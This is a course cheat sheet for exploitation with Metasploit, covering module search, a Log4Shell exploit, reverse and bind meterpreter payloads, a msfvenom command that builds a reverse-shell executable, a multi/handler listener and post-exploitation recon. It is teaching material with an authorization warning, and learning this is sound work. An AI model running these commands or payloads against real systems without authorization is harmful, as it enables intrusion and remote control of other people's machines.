Cheat sheet — Exploitation with Metasploit¶
Companion to Module 04 — Exploitation Fundamentals · CC BY 4.0 — print it, pin it, share it.
Last reviewed: 2026-07
Only exploit systems you own or have explicit written permission to test. Use real CVEs against intentionally vulnerable targets (Vulhub, your own lab).
Starting up¶
msfdb init # initialise the backing Postgres DB (search/workspace speed)
msfconsole # launch the console
msfconsole -q # quiet (no banner)
db_status # confirm the DB is connected
workspace -a engagement # isolate hosts/loot per engagement
Finding and selecting a module¶
search cve:2021-44228 # search by CVE
search type:exploit apache # filter by module type + keyword
use exploit/multi/http/log4shell_header_injection
info # what it does, options, targets, references
show options # required/optional settings
show targets # target builds/architectures
show payloads # payloads compatible with THIS exploit
Setting options and payloads¶
set RHOSTS 10.0.0.5 # target(s)
set RPORT 8080
set LHOST 10.0.0.10 # YOUR IP for the callback (reverse shells)
set LPORT 4444
set payload linux/x64/meterpreter/reverse_tcp
setg LHOST 10.0.0.10 # set globally (persists across modules)
check # is the target vulnerable? (non-exploitative, when supported)
Reverse vs bind, staged vs stageless¶
# reverse: target connects OUT to you — escapes egress firewalls (the usual choice)
set payload windows/x64/meterpreter/reverse_tcp
# bind: target LISTENS, you connect in — only works if you can reach the listener
set payload windows/x64/meterpreter/bind_tcp
# staged (/) = tiny stub pulls the rest; stageless (_) = one self-contained blob
# .../meterpreter/reverse_tcp ← staged
# .../meterpreter_reverse_tcp ← stageless (more reliable through flaky links)
Firing and handling sessions¶
run # or: exploit
exploit -j # run as a background job (keeps the console free)
sessions # list active sessions
sessions -i 1 # interact with session 1
background # (Ctrl-Z) drop a session to background
Handlers, payloads without the exploit, and post¶
# generate a standalone payload (e.g. to drop via another vector)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=4444 -f exe -o shell.exe
use exploit/multi/handler # catch a callback from a msfvenom payload
set payload windows/x64/meterpreter/reverse_tcp
run
# inside meterpreter:
sysinfo | getuid | shell # host info · current user · drop to a native shell
run post/multi/recon/local_exploit_suggester # find privesc paths
Gotchas worth remembering¶
- Know which link broke. vulnerability → exploit → payload → session. When "run" fails, it's almost always the wrong target build or a payload/arch mismatch — not the exploit.
check,show targets, and the rightx64vsx86payload fix most failures. LHOSTis your address,RHOSTis theirs. The single most common self-own is settingLHOSTto the target — the reverse shell then calls a host that isn't listening and nothing comes back.- Reverse beats bind because of egress. Firewalls block inbound far more than outbound; a reverse shell rides the same NAT/egress asymmetry every network engineer knows. Reach for bind only when outbound is filtered but you can reach a listener.
- Every exploit is loud. The crash, the spawned child process, the network callback — that's the exact T1190 telemetry the blue team hunts. Exploiting consciously means you can later tell a defender precisely what to look for.
- The framework hides the details you need most. When it "just works" you learn nothing; when it doesn't, only understanding the chain saves you. Do the without-a-framework version once so the automated version isn't a black box.
Comments
Sign in with GitHub to comment. Choose the type: Feedback (errors or suggestions on this page) · Hints (help for fellow learners — no spoilers) · General (anything else).